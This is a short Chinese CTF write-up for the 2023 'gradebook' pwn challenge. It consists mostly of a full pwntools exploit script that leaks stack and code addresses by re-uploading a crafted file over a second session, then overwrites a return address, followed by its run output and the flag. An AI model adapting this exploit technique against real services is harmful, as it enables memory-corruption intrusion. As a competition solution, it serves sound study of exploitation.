gradebook 打不通的原因找到了
谔谔了，本来打算放弃了，结果刚爬上床突然想起来：这个 chal 文件是我自己编译的，因为没有在仓库里找到二进制文件；而自己编译出来的程序栈的排布和官方的不太一样 😓
anyways
最终的 exp 长这样
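from pwn import *

# Target binary and remote endpoint as given in the write-up.
elf_path = "./chal"
ip = "gradebook.2023.ctfcompetition.com"
port = "1337"
# content == 1 selects a local debugging session; anything else goes remote.
content = 0
context(os='linux', arch='amd64')

if content == 1:
    # Local debugging: one plain process and one under gdb, split in tmux.
    os.system('tmux set mouse on')
    context.terminal = ['tmux', 'splitw', '-h']
    # p = process(elf_path)
    p_fake = process(elf_path)
    p = gdb.debug(elf_path)
else:
    # Two independent sessions: `p` drives the main interaction, `p_fake`
    # is only used to re-upload a crafted file under the same filename.
    p = remote(ip, port)
    p_fake = remote(ip, port)

# Short aliases for the pwntools tube API; `leak` logs a named address.
r = lambda: p.recv()
rx = lambda x: p.recv(x)
ru = lambda x: p.recvuntil(x)
rud = lambda x: p.recvuntil(x, drop=True)
s = lambda x: p.send(x)
sl = lambda x: p.sendline(x)
sa = lambda x, y: p.sendafter(x, y)
sla = lambda x, y: p.sendlineafter(x, y)
leak = lambda name, addr: log.success('{} = {:#x}'.format(name, addr))

# ----------------------------------------------------------
# Step 1: upload a normal gradebook and keep the server-generated filename
# (the first 44 bytes printed after 'GENERATED FILENAME: ').
sla(b'PASSWORD:\n', b'pencil')
sla(b'3. QUIT\n\n', b'2')
sla(b'ENTER FILENAME:\n', b'x')
rud(b'GENERATED FILENAME: ')
file_name = ru(b'ENTER')[:44].decode()
# Read the local gradebook file; the original left this handle open,
# `with` closes it once the contents are in memory.
with open("gradebook", "rb") as f:
    file_data = f.read()
sla(b'FILE SIZE:\n', str(len(file_data)).encode())
sa(b'SEND BINARY FILE DATA:\n', file_data)
sla(b'3. QUIT\n\n', b'1')
sla(b'ENTER FILENAME:', file_name.encode())
log.success(file_name)

# Step 2: leak a stack address.
# Add a class whose ROOM field is b'1111'; the listing that follows echoes
# bytes after ' 1111 ' which are read up to the first 0x7f byte and decoded
# as a little-endian pointer. The +0x38 is the author's adjustment to reach
# the saved return address (offset taken from the write-up, not re-derived).
sla(b'6. QUIT\n\n', b'1')
sla(b'CLASS:\n', b'1')
sla(b'COURSE TITLE:\n', b'1')
sla(b'GRADE:\n', b'1')
sla(b'TEACHER:\n', b'1')
sla(b'ROOM:\n', b'1'*4)
sla(b'PERIOD:\n', b'1')
ru(b' 1111 ')
ret_addr = u64(ru(b'\x7f').ljust(8, b'\x00')) + 0x38
leak('ret_addr', ret_addr)

# Step 3: leak a code address.
# grade_book is presumably the fixed address at which the server maps the
# uploaded gradebook (the flag text refers to mmap parsing) — confirm against
# the binary. The crafted file keeps the first 0x48 bytes of the real one
# and appends three qwords: -1 and twice the offset of ret_addr relative to
# that mapping. It is uploaded over the second session under the same
# filename, then 'WHICH GRADE: 0' on the main session prints the value
# stored at that offset, which is read back as fun_addr.
grade_book = 0x4752ADE50000
fake_file = file_data[:0x48]
fake_file += p64(0xffffffffffffffff)
fake_file += p64(ret_addr - grade_book)
fake_file += p64(ret_addr - grade_book)
p_fake.sendlineafter(b'PASSWORD:\n', b'pencil')
p_fake.sendlineafter(b'3. QUIT\n\n', b'2')
p_fake.sendlineafter(b'ENTER FILENAME:\n', file_name.encode())
p_fake.sendlineafter(b'ENTER FILE SIZE:\n', str(len(fake_file)).encode())
p_fake.sendafter(b'SEND BINARY FILE DATA:\n', fake_file)
sla(b'6. QUIT\n\n', b'2')
sla(b'WHICH GRADE:\n', b'0')
ru(b'\x0a ')
fun_addr = u64(rud(b' ').ljust(8, b'\x00'))
leak('fun_addr', fun_addr)

# Step 4: overwrite the return address (per the author's comment).
# The CLASS field carries a packed pointer; 0xc93 is the author's offset
# from the leaked fun_addr to the intended target and is not re-derived here.
sla(b'6. QUIT\n\n', b'1')
sla(b'CLASS:\n', p64(fun_addr - 0xc93))
sla(b'COURSE TITLE:\n', b'1')
sla(b'GRADE:\n', b'1')
sla(b'TEACHER:\n', b'1')
sla(b'ROOM:\n', b'1'*4)
sla(b'PERIOD:\n', b'1')
p.interactive()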
就可以打通了
[+] Opening connection to gradebook.2023.ctfcompetition.com on port 1337: Done
[+] Opening connection to gradebook.2023.ctfcompetition.com on port 1337: Done
[+] /tmp/grades_041b92931f41f2b08fcb4a5fa0585999
[+] ret_addr = 0x7ffe07582fe8
[+] fun_addr = 0x55659d79a386
[*] Switching to interactive mode
CTF{mm4p_p4rs1ng_c0nsid3red_h4rmfu1}
[*] Got EOF while reading in interactive